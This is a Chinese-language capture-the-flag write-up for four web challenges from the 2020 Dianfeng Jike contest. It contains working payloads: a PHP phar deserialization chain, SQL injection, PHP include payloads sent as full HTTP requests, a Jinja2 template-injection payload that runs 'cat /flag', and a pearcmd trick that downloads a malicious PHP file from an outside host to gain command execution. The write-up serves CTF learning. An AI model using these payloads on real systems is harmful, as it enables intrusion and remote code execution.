巅峰极客2020wp

巅峰极客2020

文章首发于安全客

babyphp2

文件包含：http://eci-2ze5jqyhfniloont8y3x.cloudeci1.ichunqiu.com/index.php?action=../../../../../../../../../../../var/www/html/login
登入接口ban掉：

`,\,@,%,#

[11:00:52] 200 -   68B  - /index.php
[11:00:53] 200 -   68B  - /index.php/login/
[11:01:33] 200 -  583B  - /login.php
[11:03:57] 403 -  335B  - /server-status
[11:04:19] 403 -  336B  - /server-status/
[11:05:21] 200 -  422B  - /upload.php
[11:05:22] 403 -  329B  - /upload/
[11:05:41] 301 -  383B  - /upload  ->  http://eci-2ze5jqyhfniloont8y3x.cloudeci1.ichunqiu.com/upload/
[11:06:20] 200 -    4KB - /www.zip

构造反序列化链：dbCtrl::__destruct->User::__toString->Reader::__set

<?php

Class Reader{
    public $filename;
    public $result;
    public function __construct(){

    }

}

class User
{
    public $id;
    public $age=null;
    public $nickname=null;
    public $backup;
    public function __construct(){
        $this->backup="/flag";
        $this->nickname=new Reader();
    }
}
class dbCtrl
{
    public $hostname="127.0.0.1";
    public $dbuser="p3rh4ps";
    public $dbpass="p3rh4ps";
    public $database="p3rh4ps";
    public $name;
    public $password;
    public $mysqli;
    public $token;
    public function __construct(){
        $this->token=new User();
    }
}

$a = new dbCtrl();
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar,phar伪协议不用phar后缀
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub,只要后面部分为__HALT_COMPILER(); 
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

compress.zlib://phar://phar.phar/test.txt绕过限制

babyback

php:5.6.40

robots.txt

User-agent: *
Disallow: /admin

[12:31:50] 200 -   38B  - /admin/
[12:31:50] 200 -   38B  - /admin/?/login
[12:31:50] 200 -   38B  - /admin/index.php
[12:31:57] 200 -   48B  - /check.php
[12:32:13] 200 -   33B  - /robots.txt
[12:41:07] 200 -   29B  - /admin/.bowerrc
[12:41:26] 301 -  185B  - /admin/assets  ->  http://eci-2ze91js64coeqpjda9u8.cloudeci1.ichunqiu.com/admin/assets/
[12:41:28] 200 -    1KB - /admin/bower.json
[12:41:38] 301 -  185B  - /admin/images  ->  http://eci-2ze91js64coeqpjda9u8.cloudeci1.ichunqiu.com/admin/images/
[12:41:39] 200 -   38B  - /admin/index.php
[12:41:57] 200 -  620B  - /admin/package.json

check.php 过滤了：

",',-,=,;,select

username=aaaa\&password= /sleep(5)%23bbbb

存在sql注入

账号密码
admin
uAreRigHt

EVAL($COMMAND."=FALSE");
过滤：;,",', ,|,`,^,\,;,/,*,(,),&,$,#,f,F

任意文件包含：

POST /admin/ HTTP/1.1
Host: eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1600698604,1601088882; UM_distinctid=174b11256cb2fd-030f86f83a6db3-333769-240000-174b11256cd6f1; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1601100971; PHPSESSID=aabua1gfiqc9s8i13u3iqace72; __jsluid_h=89eac162499bc32092c0474accd770c5
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrD05yt5m
Content-Length: 161

------WebKitFormBoundaryrD05yt5m
Content-Disposition: form-data; name="command"

?><?=include<<<DDDD
.bowerrc
DDDD
?>
------WebKitFormBoundaryrD05yt5m--

读取flag

POST /admin/ HTTP/1.1
Host: eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze3ccxvzrnduzhd4u54.cloudeci1.ichunqiu.com/admin/index.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1600698604,1601088882; UM_distinctid=174b11256cb2fd-030f86f83a6db3-333769-240000-174b11256cd6f1; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1601100971; PHPSESSID=aabua1gfiqc9s8i13u3iqace72; __jsluid_h=89eac162499bc32092c0474accd770c5
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

command=%3f%3e%3c%3f%3dinclude%7e%3c%3c%3cDDDD%0d%0a%D0%99%93%9E%98%0d%0aDDDD%0d%0a%3f%3e

babyflask

GET /loged?name=%7B%7B2*2%7D%7D
存在SSTI
模板引擎jinja2

http://eci-2ze3domag0jprtzax0lx.cloudeci1.ichunqiu.com:8888/loged?name={%%20for%20c%20in%20[].__class__.__base__.__subclasses__()%20%}{%%20if%20c.__name__==%27_IterationGuard%27%20%}{{%20c.__init__.__globals__[%27__builtins__%27][%27eval%27](%22__import__(%27os%27).popen(%27cat%20/flag%27).read()%22)%20}}{%%20endif%20%}{%%20endfor%20%}

拿flag

MeowWorld

任意文件读取

hint:register_argc_argv

register_argc_argv	TRUE	
由于该设置为 TRUE，将总是可以在 CLI SAPI 中访问到 argc（传送给应用程序参数的个数）和 argv（包含有实际参数的数组）。

对于 PHP 4.3.0，在使用 CLI SAPI 时，PHP 变量 $argc 和 $argv 已被注册并且设定了对应的值。而在这之前的版本，这两个变量在 CGI 或者 模块 版本中的建立依赖于将 PHP 的设置选项 register_globals 设为 on。除了版本和 register_globals 设定以外，可以随时通过调用 $_SERVER 或者 $HTTP_SERVER_VARS 来访问它们。例如：$_SERVER['argv']

https://khack40.info/camp-ctf-2015-trolol-web-write-up/

找到一个类似的题目，但是他们是用变量覆盖来执行

阅读pearcmd的代码发现：if (!isset($_SERVER['argv']) && !isset($argv) && !isset($HTTP_SERVER_VARS['argv']))

http://eci-2zeguuukox00jv0u113l.cloudeci1.ichunqiu.com/?list+install+--installroot+/tmp/+http://ccreater.top:60006/install.php++++++++++++++$&f=pearcmd&

后面多余部分并不影响我们下载恶意文件

http://eci-2zeguuukox00jv0u113l.cloudeci1.ichunqiu.com/?f=/tmp/tmp/pear/download/install

任意命令执行